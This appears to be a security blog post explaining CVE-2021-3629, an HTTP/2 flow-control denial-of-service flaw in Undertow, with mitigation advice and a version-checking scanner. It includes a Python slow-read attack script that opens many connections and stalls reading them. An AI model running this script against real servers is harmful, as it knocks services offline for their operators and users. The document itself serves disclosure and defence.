TL;DR:  
A flaw in Undertow's HTTP/2 flow control, tracked as CVE-2021-3629, could let a browser overload a server and cause denial of service (DoS). This post breaks down how the bug works, shows a code snippet, explains how it can be used in an exploit, and gives resources to learn more and fix vulnerable systems.

What Is CVE-2021-3629?

>CVE-2021-3629 is a denial-of-service vulnerability found in Undertow, a popular Java-based web server and servlet container.  
>
>Affected Versions:  
>- Undertow prior to 2.0.40.Final  
>- Undertow prior to 2.2.11.Final

The core problem: poor handling of HTTP/2 flow control between the browser and the server. An attacker can abuse this to consume large amounts of server memory and threads, potentially freezing or crashing the server.

Why It Matters

Undertow is widely used—directly or inside other products like JBoss/WildFly, Spring Boot, and more. If you run an old Undertow version and expose HTTP/2, your server could be a sitting duck for a simple DoS attack.

The impact: Breaking your app’s availability and giving attackers an easy way to disrupt service for real users.

How Does The Vulnerability Work?

HTTP/2 uses flow control windows, per connection and per stream, to balance traffic and resources. The server has to track a window for every active request stream.

But in vulnerable Undertow versions, the server's handling of aggressive flow control from a client is weak. If an attacker's browser opens multiple HTTP/2 streams, requests large responses, then slows the reading of data (creating backpressure), the server ends up using more and more memory and threads to try to keep up—even for requests the attacker never lets finish!

This eventually exhausts server resources—denial of service.

Here's a conceptual exploit flow:

1. An attacker opens lots of parallel HTTP/2 connections.
2. On each one, the attacker requests a big response (like a large image or file).
3. The attacker slows down reading from the server: reads a few bytes, then stops for a while, keeping each connection open.
4. The server, failing to free up resources, gets bogged down—memory fills up, CPU spikes, and new connections slow or fail.

### Example: Slow HTTP/2 Request in Python

A simple Python script using hyper-h2 and sockets could reproduce the issue:

```python
import socket
import ssl
import time
from h2.config import H2Configuration
from h2.connection import H2Connection

def slow_http2_attack(target_host, target_port=443, path='/', num_streams=100):
    context = ssl.create_default_context()
    for _ in range(num_streams):
        # One TLS connection per iteration, each left open after a partial read
        sock = socket.create_connection((target_host, target_port))
        tls_sock = context.wrap_socket(sock, server_hostname=target_host)

        # Send the HTTP/2 connection preface and initial SETTINGS
        config = H2Configuration(client_side=True, header_encoding='utf-8')
        h2_conn = H2Connection(config=config)
        h2_conn.initiate_connection()
        tls_sock.sendall(h2_conn.data_to_send())

        # Request a (large) response on stream 1
        headers = [
            (':method', 'GET'),
            (':authority', target_host),
            (':scheme', 'https'),
            (':path', path),
        ]
        h2_conn.send_headers(1, headers)
        tls_sock.sendall(h2_conn.data_to_send())

        # Read a small window, then stall reading to simulate a slow client
        received = tls_sock.recv(1024)
        time.sleep(30)  # Hold the connection open

# Usage (placeholder host; replace with a system you are authorised to test)
slow_http2_attack('your-vulnerable-server.com', 8443)
```

Warning:
Do NOT run this without permission. Test only in controlled environments!

Upgrading is the best mitigation.

Upgrade Undertow to 2.0.40.Final or 2.2.11.Final (or a later release), the first versions in each branch that are not affected.

If you can't upgrade right away:

- Disable HTTP/2 if it’s not needed.
- Monitor your server for strange spikes in HTTP/2 connections, memory, or CPU usage.

Extra Resources and References

- Red Hat Security Advisory RHSA-2021:2953
- MITRE CVE Record for CVE-2021-3629
- Undertow GitHub Repository
- Undertow Release Notes
- HTTP/2 RFC 7540, Section 5.2 (Flow Control)

Final Thoughts

Bugs like CVE-2021-3629 reveal how web performance features like HTTP/2, when mishandled, can open doors to new types of DoS attacks. If you use Undertow, update ASAP and always stay on top of security fixes.

Want to check your Undertow version & config? Run:

```
mvn dependency:tree | grep undertow
```

Or look for Undertow version strings in your deployment logs.
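To automate that check, here is an added Python example (not code from the original post or the Undertow project) that scans `mvn dependency:tree` output for io.undertow artifacts and flags versions still inside the affected ranges. The sample tree output is constructed, and the conservative treatment of branches the advisory does not name (such as 2.1.x) is an assumption.

```python
import re
from typing import Iterable, List, Tuple

# Matches Maven coordinates as printed by `mvn dependency:tree`, e.g.
# "[INFO] |  +- io.undertow:undertow-core:jar:2.2.10.Final:compile"
ARTIFACT_RE = re.compile(
    r"io\.undertow:(?P<artifact>undertow-[\w-]+):[\w-]+:(?P<version>[\w.\-]+):"
)

def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '2.2.10.Final' into (2, 2, 10); unknown formats raise ValueError."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:\.|$)", version)
    if not m:
        raise ValueError(f"unrecognised Undertow version: {version}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(version: str) -> bool:
    """True if the version is in an affected range for CVE-2021-3629:
    2.0.x before 2.0.40.Final, and everything else before 2.2.11.Final.
    Assumption (not stated in the advisory): branches it does not name,
    such as 2.1.x, are treated conservatively as affected."""
    v = parse_version(version)
    if v[:2] == (2, 0):
        return v < (2, 0, 40)
    return v < (2, 2, 11)

def find_vulnerable_artifacts(tree_output: Iterable[str]) -> List[Tuple[str, str]]:
    """Scan dependency:tree lines; return (artifact, version) pairs still affected."""
    hits = []
    for line in tree_output:
        m = ARTIFACT_RE.search(line)
        if m and is_vulnerable(m.group("version")):
            hits.append((m.group("artifact"), m.group("version")))
    return hits

# Constructed sample output (not from a real build): one patched and three affected jars.
SAMPLE_TREE = """\
[INFO] +- org.springframework.boot:spring-boot-starter-undertow:jar:2.4.0:compile
[INFO] |  +- io.undertow:undertow-core:jar:2.2.10.Final:compile
[INFO] |  +- io.undertow:undertow-servlet:jar:2.2.10.Final:compile
[INFO] |  \\- io.undertow:undertow-websockets-jsr:jar:2.2.11.Final:compile
[INFO] \\- io.undertow:undertow-core:jar:2.0.39.Final:test
""".splitlines()

if __name__ == "__main__":
    for artifact, version in find_vulnerable_artifacts(SAMPLE_TREE):
        print(f"{artifact} {version} is affected by CVE-2021-3629")
```

Pipe real output in with `mvn dependency:tree | python check_undertow.py` after swapping SAMPLE_TREE for `sys.stdin`; transitive copies pulled in by starters such as spring-boot-starter-undertow are caught the same way.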

Timeline

Published on: 05/24/2022 19:15:00 UTC
Last modified on: 07/29/2022 20:15:00 UTC